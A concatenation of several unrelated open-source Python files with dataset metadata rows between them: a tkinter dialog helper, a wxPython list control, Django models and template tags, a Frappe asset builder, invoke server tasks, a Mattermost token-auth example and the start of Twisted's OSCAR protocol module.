initialFileTypeObject = FileTypeObject(initialfile)
allFileTypeObject = FileTypeObject("*")
ALL_filetypes_was_specified = False
if not filetypes:
filetypes = list()
filetypeObjects = list()
for filemask in filetypes:
fto = FileTypeObject(filemask)
if fto.isAll():
ALL_filetypes_was_specified = True # remember this
if fto == initialFileTypeObject:
initialFileTypeObject.add(fto) # add fto to initialFileTypeObject
else:
filetypeObjects.append(fto)
# ------------------------------------------------------------------
# make sure that the list of filetypes includes the ALL FILES type.
# ------------------------------------------------------------------
if ALL_filetypes_was_specified:
pass
elif allFileTypeObject == initialFileTypeObject:
pass
else:
filetypeObjects.insert(0, allFileTypeObject)
# ------------------------------------------------------------------
# Make sure that the list includes the initialFileTypeObject
# in the position in the list that will make it the default.
# This changed between Python version 2.5 and 2.6
# ------------------------------------------------------------------
if len(filetypeObjects) == 0:
filetypeObjects.append(initialFileTypeObject)
if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]):
pass
else:
if ut.runningPython27:
filetypeObjects.append(initialFileTypeObject)
else:
filetypeObjects.insert(0, initialFileTypeObject)
filetypes = [fto.toTuple() for fto in filetypeObjects]
return initialbase, initialfile, initialdir, filetypes
def __buttonEvent(event=None, buttons=None, virtual_event=None):
"""
Handle an event that is generated by a person interacting with a button. It may be a button press
or a key press.
"""
# TODO: Replace globals with tkinter variables
global boxRoot, __replyButtonText
# Determine window location and save to global
m = re.match("(\d+)x(\d+)([-+]\d+)([-+]\d+)", boxRoot.geometry())
if not m:
raise ValueError(
"failed to parse geometry string: {}".format(boxRoot.geometry()))
width, height, xoffset, yoffset = [int(s) for s in m.groups()]
st.rootWindowPosition = '{0:+g}{1:+g}'.format(xoffset, yoffset)
# print('{0}:{1}:{2}'.format(event, buttons, virtual_event))
if virtual_event == 'cancel':
for button_name, button in list(buttons.items()):
if 'cancel_choice' in button:
__replyButtonText = button['original_text']
__replyButtonText = None
boxRoot.quit()
return
if virtual_event == 'select':
text = event.widget.config('text')[-1]
if not isinstance(text, ut.str):
text = ' '.join(text)
for button_name, button in list(buttons.items()):
if button['clean_text'] == text:
__replyButtonText = button['original_text']
boxRoot.quit()
return
# Hotkeys
if buttons:
for button_name, button in list(buttons.items()):
hotkey_pressed = event.keysym
if event.keysym != event.char: # A special character
hotkey_pressed = '<{}>'.format(event.keysym)
if button['hotkey'] == hotkey_pressed:
__replyButtonText = button_name
boxRoot.quit()
return
print("Event not understood")
def __put_buttons_in_buttonframe(choices, default_choice, cancel_choice):
"""Put the buttons in the buttons frame
"""
global buttonsFrame, cancel_invoke
# TODO: I'm using a dict to hold buttons, but this could all be cleaned up if I subclass Button to hold
# all the event bindings, etc
# TODO: Break __buttonEvent out into three: regular keyboard, default
# select, and cancel select.
unique_choices = ut.uniquify_list_of_strings(choices)
# Create buttons dictionary and Tkinter widgets
buttons = dict()
for button_text, unique_button_text in zip(choices, unique_choices):
this_button = dict()
this_button['original_text'] = button_text
this_button['clean_text'], this_button[
'hotkey'], hotkey_position = ut.parse_hotkey(button_text)
this_button['widget'] = Button(buttonsFrame,
takefocus=1,
text=this_button['clean_text'],
underline=hotkey_position)
this_button['widget'].pack(
expand=YES, side=LEFT, padx='1m', pady='1m', ipadx='2m', ipady='1m')
buttons[unique_button_text] = this_button
# Bind arrows, Enter, Escape
for this_button in list(buttons.values()):
bindArrows(this_button['widget'])
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
this_button['widget'].bind("<{}>".format(selectionEvent),
lambda e: __buttonEvent(
e, buttons, virtual_event='select'),
add=True)
# Assign default and cancel buttons
if cancel_choice in buttons:
buttons[cancel_choice]['cancel_choice'] = True
boxRoot.bind_all('<Escape>', lambda e: __buttonEvent(
e, buttons, virtual_event='cancel'), add=True)
boxRoot.protocol('WM_DELETE_WINDOW', lambda: __buttonEvent(
None, buttons, virtual_event='cancel'))
if default_choice in buttons:
buttons[default_choice]['default_choice'] = True
buttons[default_choice]['widget'].focus_force()
# Bind hotkeys
for hk in [button['hotkey'] for button in list(buttons.values()) if button['hotkey']]:
boxRoot.bind_all(hk, lambda e: __buttonEvent(e, buttons), add=True)
return
| mit | -2,887,402,941,464,055,300 | 34.333632 | 166 | 0.586568 | false | 4.157117 | false | false | false |
ODM2/ODM2StreamingDataLoader | src/wizard/controller/frmVirtualList.py | 1 | 1055 | import wx
class VirtualList(wx.ListCtrl):
def __init__(self, parent, **kwargs):
super(VirtualList, self).__init__(parent,
wx.ID_ANY, style=wx.LC_VIRTUAL | wx.LC_REPORT |\
wx.LC_VRULES | wx.LC_HRULES, **kwargs)
self.data = None
self.columns = []
def setData(self, data):
self.data = data
print data
def RefreshAllItems(self):
if self.data:
if self.DeleteAllItems():
if self.DeleteAllColumns():
self.SetItemCount(len(self.data))
self.RefreshItems(0, len(self.data) - 1)
return True
return False
def OnGetItemText(self, item, col):
return self.data[item][col]
def InsertColumns(self, columnList):
self.columns = columnList
for column in columnList:
super(VirtualList, self).InsertColumn(\
columnList.index(column), column)
def getColumnText(self, index):
return self.columns[index]
| bsd-3-clause | -944,229,307,867,308,800 | 28.305556 | 60 | 0.554502 | false | 4.089147 | false | false | false |
596acres/django-livinglots-steward | livinglots_steward/models.py | 1 | 2673 | from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.translation import ugettext_lazy as _
from livinglots_organize.models import BaseOrganizer
class OptedInStewardProjectManager(models.Manager):
"""
A manager that only returns StewardProject instances where the group asked
to be included on the map.
"""
def get_queryset(self):
return super(OptedInStewardProjectManager, self).get_queryset().filter(
include_on_map=True,
)
class StewardProjectMixin(models.Model):
objects = models.Manager()
opted_in = OptedInStewardProjectManager()
project_name = models.CharField(_('project name'),
max_length=256,
help_text=_('The name of the project using this lot.'),
)
use = models.ForeignKey('livinglots_lots.Use',
limit_choices_to={'visible': True},
help_text=_('How is the project using the land?'),
verbose_name=_('use'),
)
support_organization = models.CharField(_('support organization'),
max_length=300,
blank=True,
null=True,
help_text=_("What is your project's support organization, if any?"),
)
land_tenure_status = models.CharField(_('land tenure status'),
choices=(
('owned', _('project owns the land')),
('licensed', _('project has a license for the land')),
('lease', _('project has a lease for the land')),
('access', _('project has access to the land')),
('not sure', _("I'm not sure")),
),
default=_('not sure'),
max_length=50,
help_text=_('What is the land tenure status for the project? (This '
'will not be shared publicly.)'),
)
include_on_map = models.BooleanField(_('include on map'),
default=True,
help_text=_('Can we include the project on our map?'),
)
class Meta:
abstract = True
class BaseStewardProject(StewardProjectMixin):
started_here = models.BooleanField(default=False)
content_type = models.ForeignKey(ContentType, related_name='+')
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class Meta:
abstract = True
class BaseStewardNotification(StewardProjectMixin, BaseOrganizer):
"""
A notification from someone who is part of a stewarding project letting us
know that they are stewards on a given lot.
"""
class Meta:
abstract = True
def __unicode__(self):
return self.name
| bsd-3-clause | -1,274,561,160,493,010,000 | 31.204819 | 79 | 0.640853 | false | 4.2768 | false | false | false |
filipefigcorreia/TracAdaptiveSoftwareArtifacts | AdaptiveArtifacts/model/pool.py | 1 | 3048 | # -*- coding: utf-8 -*-
#
# This software is licensed as described in the file license.txt, which
# you should have received as part of this distribution.
from core import *
class InstancePool(object):
"""
Container for instances of Instance and Entity, that provides
some utility methods to search through them.
"""
def __init__(self):
self._items = []
# Handle special case of the top-most classes of the instantiation chain (Entity and Instance).
# They are not loaded explicitly, and are always available from any pool.
self.add(Entity)
self.add(Instance)
def add(self, instance):
id = instance.get_id()
if not id is None and not self.get_item(id) is None:
# raising an exception is an option. an alternative would be to silently replace the instance with the one
# being loaded, but there may be implications when working with multiple versions of a same instance
raise Exception("Instance with id '%s' already exists in the pool" % (instance.get_id(),))
self._items.append(instance)
def remove(self, item):
self._items.remove(item)
def get_item(self, id):
assert(not id is None)
for item in self._items:
if item.get_id() == id:
return item
return None
def get_items(self, levels=(0,1,2), base_name=None):
result = self._items
if not levels == (0,1,2):
result = [item for item in result if
isinstance(item, Instance) and 0 in levels or
isinstance(item, Entity) and 1 in levels or
item in (Entity, Instance) and 2 in levels]
if not base_name is None:
base = self.get_item(base_name)
result = [item for item in result if isinstance(item, Entity) and len(item.__bases__) > 0 and item.__bases__[0] is base]
return result
def get_instances_of(self, spec_name, direct_instances_only=False):
assert(not spec_name is None)
if direct_instances_only:
return [item for item in self._items if hasattr(item.__class__, 'name') and item.__class__.name == spec_name]
else:
spec_and_childs = self.get_spec_and_child_specs(spec_name)
return [item for item in self._items if item.__class__ in spec_and_childs]
def get_spec_and_child_specs(self, spec_name):
inh_chain = current = [self.get_item(spec_name)]
while True:
childs = [self.get_items(base_name=spec.get_name()) for spec in current]
current = [child for sublist in childs for child in sublist]
if len(current) == 0:
break
inh_chain.extend(current)
return inh_chain
def get_possible_domains(self):
pool = self
possible_domains = {'string':'string'}
possible_domains.update(dict([(i.get_identifier(), i.get_name()) for i in pool.get_items(levels=(1,))]))
return possible_domains
| bsd-3-clause | -5,987,743,707,636,190,000 | 40.189189 | 132 | 0.608268 | false | 4.053191 | false | false | false |
TimBizeps/BachelorAP | V503_Millikan Versuch/matrix2latex/src_python/fixEngineeringNotation.py | 3 | 1220 | """This file is part of matrix2latex.
matrix2latex is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
matrix2latex is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with matrix2latex. If not, see <http://www.gnu.org/licenses/>.
"""
import re
def fix(s, table=False):
"""
input: (string) s
output: (string) s
takes any number in s and replaces the format
'8e-08' with '8\e{-08}'
"""
i = re.search('e[-+]\d\d', s)
while i != None:
before = s[0:i.start()]
number = s[i.start()+1:i.start()+4]
after = s[i.end():]
if table:
num = "%(#)+03d" % {'#': int(number)}
else:
num = "%(#)3d" % {'#': int(number)}
s = '%s\\e{%s}%s' % (before, num, after)
i = re.search('e[-+]\d\d', s)
return s
| gpl-3.0 | 7,896,424,702,390,345,000 | 31.105263 | 68 | 0.62541 | false | 3.485714 | false | false | false |
rohitw1991/frappe | frappe/build.py | 28 | 4438 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
from frappe.utils.minify import JavascriptMinify
"""
Build the `public` folders and setup languages
"""
import os, sys, frappe, json, shutil
from cssmin import cssmin
def bundle(no_compress, make_copy=False, verbose=False):
"""concat / minify js files"""
# build js files
make_asset_dirs(make_copy=make_copy)
build(no_compress, verbose)
def watch(no_compress):
"""watch and rebuild if necessary"""
import time
build(no_compress=True)
while True:
if files_dirty():
build(no_compress=True)
time.sleep(3)
def make_asset_dirs(make_copy=False):
assets_path = os.path.join(frappe.local.sites_path, "assets")
for dir_path in [
os.path.join(assets_path, 'js'),
os.path.join(assets_path, 'css')]:
if not os.path.exists(dir_path):
os.makedirs(dir_path)
# symlink app/public > assets/app
for app_name in frappe.get_all_apps(True):
pymodule = frappe.get_module(app_name)
source = os.path.join(os.path.abspath(os.path.dirname(pymodule.__file__)), 'public')
target = os.path.join(assets_path, app_name)
if not os.path.exists(target) and os.path.exists(source):
if make_copy:
shutil.copytree(os.path.abspath(source), target)
else:
os.symlink(os.path.abspath(source), target)
def build(no_compress=False, verbose=False):
assets_path = os.path.join(frappe.local.sites_path, "assets")
for target, sources in get_build_maps().iteritems():
pack(os.path.join(assets_path, target), sources, no_compress, verbose)
shutil.copy(os.path.join(os.path.dirname(os.path.abspath(frappe.__file__)), 'data', 'languages.txt'), frappe.local.sites_path)
# reset_app_html()
def get_build_maps():
"""get all build.jsons with absolute paths"""
# framework js and css files
pymodules = [frappe.get_module(app) for app in frappe.get_all_apps(True)]
app_paths = [os.path.dirname(pymodule.__file__) for pymodule in pymodules]
build_maps = {}
for app_path in app_paths:
path = os.path.join(app_path, 'public', 'build.json')
if os.path.exists(path):
with open(path) as f:
try:
for target, sources in json.loads(f.read()).iteritems():
# update app path
source_paths = []
for source in sources:
if isinstance(source, list):
s = frappe.get_pymodule_path(source[0], *source[1].split("/"))
else:
s = os.path.join(app_path, source)
source_paths.append(s)
build_maps[target] = source_paths
except Exception, e:
print path
raise
return build_maps
timestamps = {}
def pack(target, sources, no_compress, verbose):
from cStringIO import StringIO
outtype, outtxt = target.split(".")[-1], ''
jsm = JavascriptMinify()
for f in sources:
suffix = None
if ':' in f: f, suffix = f.split(':')
if not os.path.exists(f) or os.path.isdir(f):
print "did not find " + f
continue
timestamps[f] = os.path.getmtime(f)
try:
with open(f, 'r') as sourcefile:
data = unicode(sourcefile.read(), 'utf-8', errors='ignore')
extn = f.rsplit(".", 1)[1]
if outtype=="js" and extn=="js" and (not no_compress) and suffix!="concat" and (".min." not in f):
tmpin, tmpout = StringIO(data.encode('utf-8')), StringIO()
jsm.minify(tmpin, tmpout)
minified = tmpout.getvalue()
outtxt += unicode(minified or '', 'utf-8').strip('\n') + ';'
if verbose:
print "{0}: {1}k".format(f, int(len(minified) / 1024))
elif outtype=="js" and extn=="html":
# add to frappe.templates
content = data.replace("\n", " ").replace("'", "\'")
outtxt += """frappe.templates["{key}"] = '{content}';\n""".format(\
key=f.rsplit("/", 1)[1][:-5], content=content)
else:
outtxt += ('\n/*\n *\t%s\n */' % f)
outtxt += '\n' + data + '\n'
except Exception, e:
print "--Error in:" + f + "--"
print frappe.get_traceback()
if not no_compress and outtype == 'css':
pass
#outtxt = cssmin(outtxt)
with open(target, 'w') as f:
f.write(outtxt.encode("utf-8"))
print "Wrote %s - %sk" % (target, str(int(os.path.getsize(target)/1024)))
def files_dirty():
for target, sources in get_build_maps().iteritems():
for f in sources:
if ':' in f: f, suffix = f.split(':')
if not os.path.exists(f) or os.path.isdir(f): continue
if os.path.getmtime(f) != timestamps.get(f):
print f + ' dirty'
return True
else:
return False
| mit | -5,458,223,066,992,664,000 | 28.390728 | 127 | 0.64849 | false | 2.921659 | false | false | false |
qitan/icomments | icomments/templatetags/comment.py | 2 | 1218 | # -*- coding:utf8 -*-
from django import template
from django.db.models import Q
from icomments.models import Comments
from icomments.forms import ComForm
register = template.Library()
def show_comment(value):
'''
文章评论
'''
comform = ComForm()
# 获取已批准或隐藏的评论
comments = Comments.objects.filter(Q(approved=0)|Q(approved=3)).filter(post_id=value)
# 构造嵌套评论
dic={i.id:[i.id,i.parent,[],0,i] for i in comments}
stack=[]
for c in dic:
i=dic[c]
pid=i[1]
if pid!=0 and dic.get(pid)!=None:
p=dic[pid]
p[2].append(i)
i[3]=p[3]+1
else:
stack.insert(0,i)
result=[]
while stack:
top=stack.pop()
result.append(top[4])
top[2].reverse()
stack.extend(top[2])
comments = result
return {'comments':comments,'comform':comform,'comment_post_id':value}
register.inclusion_tag('icomments/comment.html')(show_comment)
def show_latest_comment():
comments = Comments.objects.filter(Q(parent=0)&Q(approved=0))[:5]
return {'comments':comments}
register.inclusion_tag('icomments/comment_latest.html')(show_latest_comment)
| gpl-3.0 | -6,502,655,968,941,639,000 | 24.565217 | 89 | 0.614796 | false | 2.962217 | false | false | false |
dharmeshpatel/shoppingcart | shoppingCart/release.py | 1 | 1970 | #!/usr/bin/python
# -*- encoding: utf-8 -*-
################################################################################
#
# Copyright (C) 2010 - 2015 Dharmesh Patel <[email protected]>.
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
name = 'shoppingCart'
version = '1.4.2'
major_version = '1'
description = 'shoppingCart is a open source cart developed using Python language to manage cart in Ecommerce applications.'
long_description= """
Majour Feature(s):
1. Product options support.
2. Multi discount support.
3. Multi tax support(specific to product as well as general taxes).
4. Multi currency support.
5. Tax Exclude and Include total.
6. Shipping method and charge.
"""
classifiers = [
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python"
]
url = 'https://github.com/dharmeshpatel/shoppingcart'
author = 'Dharmesh Patel'
author_email = 'mr[dot]dlpatel[at]gmail[dot]com'
copyright = 'Copyright (c) 2010 - 2015 Dharmesh Patel'
license = 'BSD'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| bsd-3-clause | 100,771,357,863,046,540 | 40.041667 | 128 | 0.607614 | false | 4.129979 | false | false | false |
classam/threepanel | threepanel/tasks.py | 1 | 5979 | import os
import subprocess
import shlex
from invoke import task, run
from invoke.exceptions import Failure
YOUR_APP_NAME = "threepanel"
HOME_PATH = os.environ['HOME']
DJANGO_PATH = os.path.join(HOME_PATH, 'vagrant_django', YOUR_APP_NAME)
SCRIPTS_PATH = os.path.join(HOME_PATH, 'vagrant_django', 'scripts')
UWSGI_LOG_PATH = os.path.join(HOME_PATH, 'logs', 'uwsgi.log')
UWSGI_SH_PATH = os.path.join(HOME_PATH, 'uwsgi.sh')
UWSGI_PID_PATH = os.path.join(HOME_PATH, 'uwsgi.pid')
def python():
thing = run("python --version")
if str(thing.stdout).startswith("Python 3."):
return "python"
else:
return "python3"
def background(cmd):
subprocess.Popen(shlex.split(cmd))
def multiple(*args):
return " && ".join(args)
@task
def home(command, *args, **kwargs):
""" Run a command from the base django directory """
return run(multiple("cd {}".format(DJANGO_PATH), command), *args, **kwargs)
@task
def test():
""" Run all the tests. """
return dj("test images dashboard comics")
@task
def lint():
""" Run the PEP8 and Pyflakes linters """
return home("pylint *")
@task
def search(stuff):
""" Ack around for stuff """
return home("ack {}".format(stuff))
@task
def dj(command, *args, **kwargs):
""" Run a django manage.py command """
return home("{} manage.py {}".format(python(), command), *args, **kwargs)
@task()
def runserver():
""" Run a django development server """
print("Running server on localhost:8080 (Vagrant Host:18080)")
return dj("runserver 0:8080", pty=True)
@task()
def dev_start():
""" Run a django development server """
return runserver()
@task
def makemigrations():
""" Prep the prepping of the database """
return dj("makemigrations")
@task
def collectstatic():
""" Collect all of the static files from the django codebase
and plop them in the STATIC_ROOT defined in settings.py """
return dj("collectstatic --clear --noinput")
@task
def migrate():
""" Prep the database """
return dj("migrate")
@task
def auth_keys():
""" Do something insecure and terrible """
return run("python3 /home/vagrant/vagrant_django/keys.py > ~/.ssh/authorized_keys")
@task()
def dump():
""" Dump the Postgres DB to a file. """
print("Dumping DB")
run("dos2unix {}/backup_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/backup_postgres.sh".format(SCRIPTS_PATH))
@task()
def restore(filename):
""" Restore the Postgres DB from a file.
hey, past Curtis, does this actually work? be honest
"""
print("Dumping DB")
dump()
print("Destrying DB")
run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH))
print("Restoring DB from file: {}".format(filename))
run("dos2unix {}/rebuild_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/rebuild_postgres.sh {}".format(SCRIPTS_PATH, filename), echo=True)
@task()
def clear():
""" Destroy and recreate the database """
print("Resetting db")
dump()
run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH))
dj("makemigrations")
dj("migrate --noinput")
#dj("testdata")
@task
def uwsgi():
""" Activate the Python Application Server. """
print("writing logs to {}".format(UWSGI_LOG_PATH))
print("writing pidfile to {}".format(UWSGI_PID_PATH))
background("bash {}/uwsgi.sh".format(SCRIPTS_PATH))
@task
def kill_uwsgi():
if os.path.exists("{}/uwsgi.pid".format(HOME_PATH)):
print("Killing UWSGI...")
return run("kill `cat {}/uwsgi.pid`".format(HOME_PATH), pty=True)
print("UWSGI Dead...")
else:
print("UWSGI not running!")
@task
def celery():
""" Activate the task running system. """
print("Activating celery worker.")
background("bash {}/celery.sh".format(SCRIPTS_PATH))
@task
def kill_celery():
if os.path.exists("{}/celery.pid".format(HOME_PATH)):
print("Killing Celery...")
return run("kill `cat {}/celery.pid`".format(HOME_PATH), pty=True)
print("Celery Dead...")
else:
print("Celery not running!")
@task
def postgres():
print("Starting Postgres...")
return run("sudo service postgresql start")
@task
def kill_postgres():
print("Killing Postgres...")
return run("sudo service postgresql stop")
@task
def nginx():
print("Starting Nginx...")
return run("sudo service nginx start")
@task
def kill_nginx():
print("Killing Nginx...")
return run("sudo service nginx stop")
@task
def redis():
print("Starting Redis...")
return run("sudo service redis-server start")
@task
def kill_redis():
print("Killing Redis...")
return run("sudo service redis-server stop")
@task
def restart_syslog():
print("Restarting Syslog...")
return run("sudo service rsyslog restart")
@task
def remote_syslog():
""" Activate remote_syslog to pull celery logs to papertrail. """
print("Activating remote_syslog.")
background("bash {}/remote_syslog.sh".format(SCRIPTS_PATH))
@task
def kill_remote_syslog():
if os.path.exists("{}/remote_syslog.pid".format(HOME_PATH)):
print("Killing Remote Syslog...")
return run("kill `cat {}/remote_syslog.pid`".format(HOME_PATH), pty=True)
print("Remote Syslog Dead...")
else:
print("Remote Syslog not running!")
@task
def prod_start():
""" Start all of the services in the production stack"""
collectstatic()
postgres()
uwsgi()
celery()
nginx()
redis()
restart_syslog()
return remote_syslog()
@task
def prod_stop():
""" Stop all of the services in the production stack"""
kill_postgres()
kill_uwsgi()
kill_celery()
kill_nginx()
kill_remote_syslog()
return kill_redis()
@task
def prod_restart():
""" Restart all of the services in the production stack """
prod_stop()
return prod_start()
| agpl-3.0 | 6,199,138,148,214,750,000 | 25.223684 | 87 | 0.641913 | false | 3.468097 | false | false | false |
Vaelor/python-mattermost-driver | docs/mmDriverTokenAuthExample.py | 1 | 3713 |
# A simple example to retrieve all users for a team while using a _token_
# from the .netrc file instead of a password (as requests assumes by default)
import logging
import requests
import netrc
from mattermostdriver import Driver
logging.basicConfig( format='%(levelname)s - %(name)s - %(asctime)s - %(message)s' )
logger = logging.getLogger( 'MattermostManager' )
logger.setLevel( logging.INFO )
# requests overrides the simple authentication token header if it finds the entry in
# the ~/.netrc file. Since we want to use ~/.netrc to retrieve the _token_, we need
# to provide our own Authenticator class:
class TokenAuth( requests.auth.AuthBase ) :
def __call__( self, r ) :
# Implement my authentication
mmHost = 'mattermost.host.in.netrc'
(login, account, password) = netrc.netrc().authenticators( mmHost )
r.headers[ 'Authorization' ] = "Bearer %s" % password
return r
class MattermostManager( object ) :
def __init__( self ) :
# Get the _token_ (as "password") from the ~/.netrc file.
# the corresponding line in the file should look like:
# <mattermost.host.in.netrc> foo foo <long-string-of-token>
# The "login" and "account" (both set to "foo" in the example are ignored)
mmHost = 'mattermost.host.in.netrc'
(login, account, password) = netrc.netrc().authenticators( mmHost )
logger.debug( "Going to set up driver for connection to %s " % (mmHost,) )
self.mmDriver = Driver( options={
'url' : mmHost,
'scheme' : 'https',
'port' : 443,
'auth' : TokenAuth, # use the new Authenticator class defined above
} )
self.mmDriver.users.get_user( user_id='me' )
def getTeamMembers( self, teamName ) :
# for restricted teams, we need to get the ID first, and
# for this, we need to have the "name" (as in the URL), not
# the "display name", as shown in the GUIs:
team0 = self.mmDriver.teams.get_team_by_name( teamName )
logger.debug( 'team by name %s : %s' % (teamName, team0) )
teamId = team0[ 'id' ]
team = self.mmDriver.teams.check_team_exists( teamName )
logger.debug( 'team %s - exists: %s' % (teamName, team[ 'exists' ]) )
if not team[ 'exists' ] :
logger.error( 'no team with name %s found' % teamName )
return
logger.debug( 'found team %s: %s' % (teamName, self.mmDriver.teams.get_team( teamId )) )
users = self._getAllUsersForTeam( teamId )
logger.debug( 'found %s users for team "%s"' % (len( users ), teamName) )
return users
def _getAllUsersForTeam( self, teamId ) :
# get all users for a team
# with the max of 200 per page, we need to iterate a bit over the pages
users = [ ]
pgNo = 0
teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId,
'page' : str( pgNo ),
'per_page' : 200,
} )
while teamUsers :
users += teamUsers
pgNo += 1
teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId,
'per_page' : 200,
'page' : str( pgNo ),
} )
return users
if __name__ == '__main__' :
mmM = MattermostManager()
mmM.getTeamMembers( 'myTeam' )
| mit | 597,084,315,841,375 | 38.084211 | 96 | 0.543496 | false | 3.916667 | false | false | false |
MrLoick/python-for-android | python-modules/twisted/twisted/words/protocols/oscar.py | 53 | 43256 | # -*- test-case-name: twisted.words.test -*-
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
An implementation of the OSCAR protocol, which AIM and ICQ use to communcate.
Maintainer: Paul Swartz
"""
import struct
import string
import socket
import random
import types
import re
from twisted.internet import reactor, defer, protocol
from twisted.python import log
from twisted.python.hashlib import md5
def logPacketData(data):
lines = len(data)/16
if lines*16 != len(data): lines=lines+1
for i in range(lines):
d = tuple(data[16*i:16*i+16])
hex = map(lambda x: "%02X"%ord(x),d)
text = map(lambda x: (len(repr(x))>3 and '.') or x, d)
log.msg(' '.join(hex)+ ' '*3*(16-len(d)) +''.join(text))
log.msg('')
def SNAC(fam,sub,id,data,flags=[0,0]):
header="!HHBBL"
head=struct.pack(header,fam,sub,
flags[0],flags[1],
id)
return head+str(data)
def readSNAC(data):
header="!HHBBL"
head=list(struct.unpack(header,data[:10]))
return head+[data[10:]]
def TLV(type,value):
header="!HH"
head=struct.pack(header,type,len(value))
return head+str(value)
def readTLVs(data,count=None):
header="!HH"
dict={}
while data and len(dict)!=count:
head=struct.unpack(header,data[:4])
dict[head[0]]=data[4:4+head[1]]
data=data[4+head[1]:]
if not count:
return dict
return dict,data
def encryptPasswordMD5(password,key):
m=md5()
m.update(key)
m.update(md5(password).digest())
m.update("AOL Instant Messenger (SM)")
return m.digest()
def encryptPasswordICQ(password):
key=[0xF3,0x26,0x81,0xC4,0x39,0x86,0xDB,0x92,0x71,0xA3,0xB9,0xE6,0x53,0x7A,0x95,0x7C]
bytes=map(ord,password)
r=""
for i in range(len(bytes)):
r=r+chr(bytes[i]^key[i%len(key)])
return r
def dehtml(text):
text=string.replace(text,"<br>","\n")
text=string.replace(text,"<BR>","\n")
text=string.replace(text,"<Br>","\n") # XXX make this a regexp
text=string.replace(text,"<bR>","\n")
text=re.sub('<.*?>','',text)
text=string.replace(text,'>','>')
text=string.replace(text,'<','<')
text=string.replace(text,' ',' ')
text=string.replace(text,'"','"')
text=string.replace(text,'&','&')
return text
def html(text):
text=string.replace(text,'"','"')
text=string.replace(text,'&','&')
text=string.replace(text,'<','<')
text=string.replace(text,'>','>')
text=string.replace(text,"\n","<br>")
return '<html><body bgcolor="white"><font color="black">%s</font></body></html>'%text
class OSCARUser:
def __init__(self, name, warn, tlvs):
self.name = name
self.warning = warn
self.flags = []
self.caps = []
for k,v in tlvs.items():
if k == 1: # user flags
v=struct.unpack('!H',v)[0]
for o, f in [(1,'trial'),
(2,'unknown bit 2'),
(4,'aol'),
(8,'unknown bit 4'),
(16,'aim'),
(32,'away'),
(1024,'activebuddy')]:
if v&o: self.flags.append(f)
elif k == 2: # member since date
self.memberSince = struct.unpack('!L',v)[0]
elif k == 3: # on-since
self.onSince = struct.unpack('!L',v)[0]
elif k == 4: # idle time
self.idleTime = struct.unpack('!H',v)[0]
elif k == 5: # unknown
pass
elif k == 6: # icq online status
if v[2] == '\x00':
self.icqStatus = 'online'
elif v[2] == '\x01':
self.icqStatus = 'away'
elif v[2] == '\x02':
self.icqStatus = 'dnd'
elif v[2] == '\x04':
self.icqStatus = 'out'
elif v[2] == '\x10':
self.icqStatus = 'busy'
else:
self.icqStatus = 'unknown'
elif k == 10: # icq ip address
self.icqIPaddy = socket.inet_ntoa(v)
elif k == 12: # icq random stuff
self.icqRandom = v
elif k == 13: # capabilities
caps=[]
while v:
c=v[:16]
if c==CAP_ICON: caps.append("icon")
elif c==CAP_IMAGE: caps.append("image")
elif c==CAP_VOICE: caps.append("voice")
elif c==CAP_CHAT: caps.append("chat")
elif c==CAP_GET_FILE: caps.append("getfile")
elif c==CAP_SEND_FILE: caps.append("sendfile")
elif c==CAP_SEND_LIST: caps.append("sendlist")
elif c==CAP_GAMES: caps.append("games")
else: caps.append(("unknown",c))
v=v[16:]
caps.sort()
self.caps=caps
elif k == 14: pass
elif k == 15: # session length (aim)
self.sessionLength = struct.unpack('!L',v)[0]
elif k == 16: # session length (aol)
self.sessionLength = struct.unpack('!L',v)[0]
elif k == 30: # no idea
pass
else:
log.msg("unknown tlv for user %s\nt: %s\nv: %s"%(self.name,k,repr(v)))
def __str__(self):
s = '<OSCARUser %s' % self.name
o = []
if self.warning!=0: o.append('warning level %s'%self.warning)
if hasattr(self, 'flags'): o.append('flags %s'%self.flags)
if hasattr(self, 'sessionLength'): o.append('online for %i minutes' % (self.sessionLength/60,))
if hasattr(self, 'idleTime'): o.append('idle for %i minutes' % self.idleTime)
if self.caps: o.append('caps %s'%self.caps)
if o:
s=s+', '+', '.join(o)
s=s+'>'
return s
class SSIGroup:
def __init__(self, name, tlvs = {}):
self.name = name
#self.tlvs = []
#self.userIDs = []
self.usersToID = {}
self.users = []
#if not tlvs.has_key(0xC8): return
#buddyIDs = tlvs[0xC8]
#while buddyIDs:
# bid = struct.unpack('!H',buddyIDs[:2])[0]
# buddyIDs = buddyIDs[2:]
# self.users.append(bid)
def findIDFor(self, user):
return self.usersToID[user]
def addUser(self, buddyID, user):
self.usersToID[user] = buddyID
self.users.append(user)
user.group = self
def oscarRep(self, groupID, buddyID):
